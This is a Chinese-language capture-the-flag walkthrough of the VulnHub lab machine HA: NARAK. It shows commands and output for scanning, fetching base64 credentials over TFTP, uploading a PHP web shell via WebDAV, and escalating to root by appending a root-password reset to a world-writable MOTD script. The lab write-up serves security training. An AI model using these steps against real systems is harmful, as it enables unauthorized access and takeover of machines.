VulnHub HA: NARAK writeup

下载地址:https://www.vulnhub.com/entry/ha-narak,569/

flag1

扫目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ dirsearch -e * –timeout=2 -t 1 -x 400,403,404,500,503,429 -u http://192.168.231.22/

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: 1.py | HTTP method: GET | Threads: 1 | Wordlist size: 8989

Output File: /usr/local/lib/python3.9/site-packages/dirsearch/reports/192.168.231.22/-_21-09-20_12-28-11.txt

Error Log: /usr/local/lib/python3.9/site-packages/dirsearch/logs/errors-21-09-20_12-28-11.log

Target: http://192.168.231.22/

[12:28:11] Starting:
[12:28:19] 301 - 317B - /images -> http://192.168.231.22/images/
[12:28:19] 200 - 4KB - /images/
[12:28:19] 200 - 3KB - /index.html
[12:28:23] 401 - 461B - /webdav/
[12:28:23] 401 - 461B - /webdav/index.html
[12:28:23] 401 - 461B - /webdav/servlet/webdav/

访问webdav得到登录界面,但是不知道密码
根据网上wp,扫出tips.txt,得到提示,还有一种就是通过cewl网站生成密码本爆破。

1
Hint to open the door of narak can be found in creds.txt.

扫UDP端口发现tftp服务,这个扫描比较慢

1
2
3
4
5
6
7
8
9
10
11
❯ nmap -sU 192.168.231.22
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 12:42 CST
Nmap scan report for 192.168.231.22 (192.168.231.22)
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:02:7B:2D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1117.26 seconds

下载creds.txt得到账号密码

1
2
3
4
5
6
7
8
❯ tftp 192.168.231.22
tftp> get creds.txt
Received 22 bytes in 0.1 seconds
tftp> quit
❯ cat creds.txt
eWFtZG9vdDpTd2FyZw==
echo "eWFtZG9vdDpTd2FyZw=="| base64 -D
yamdoot:Swarg%

利用cadaver上传shell

1
2
3
4
5
6
7
8
9
❯ cadaver http://192.168.231.22/webdav/
Authentication required for webdav on server `192.168.231.22':
Username: yamdoot
Password:
dav:/webdav/> put shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 35 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.231.22' closed.

注意,这里用不了菜刀、蚁剑等工具上马,只能在网页命令执行,因为除了要验证登录,每次命令执行报头的信息也跟着变化,具体可以抓包看看。
利用马查看信息,发现/mnt/hell.sh

1
#!/bin/bash echo"Highway to Hell"; --[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

brainfuck解码得chitragupt
通过ls /home得到用户名inferno narak yamdoot
尝试登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ ssh inferno@192.168.231.22
inferno@192.168.231.22's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

New release '20.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Sep 19 22:47:00 2021 from 192.168.231.1
inferno@ubuntu:~$ ls
user.txt
inferno@ubuntu:~$ cat user.txt
Flag: {5f95bf06ce19af69bfa5e53f797ce6e2}

flag2

发现motd有读写权限,motd提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
inferno@ubuntu:~$ ls -la /etc/update-motd.d/00-header
-rwxrwxrwx 1 root root 1254 Sep 19 22:50 /etc/update-motd.d/00-header
inferno@ubuntu:~$ echo "echo 'root:admin' | sudo chpasswd" >> /etc/update-motd.d/00-header
inferno@ubuntu:~$ cat /etc/update-motd.d/00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
# Fall back to using the very slow lsb_release utility
DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
echo 'root:admin' | sudo chpasswd

退出后重新登录,利用新密码获得root权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
inferno@ubuntu:~$ exit
logout
Connection to 192.168.231.22 closed.
❯ ssh inferno@192.168.231.22
inferno@192.168.231.22's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

New release '20.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Sep 19 22:47:21 2021 from 192.168.231.1
inferno@ubuntu:~$ sudo su
[sudo] password for inferno:
Sorry, try again.
[sudo] password for inferno:
sudo: 1 incorrect password attempt
inferno@ubuntu:~$ su root
Password:
root@ubuntu:/home/inferno# cd /root
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
██████████████████████████████████████████████████████████████████████████████████████████
█░░░░░░██████████░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░█░░░░░░██░░░░░░░░█
█░░▄▀░░░░░░░░░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░▄▀▄▀▄▀▄▀▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░░░░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░████░░▄▀░░███░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░██░░░░░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░░░░░██████████░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░█
██████████████████████████████████████████████████████████████████████████████████████████


Root Flag: {9440aee508b6215995219c58c8ba4b45}

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/hackinarticles

Jeenali Kothari : https://www.linkedin.com/in/jeenali-kothari/

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
__________________________________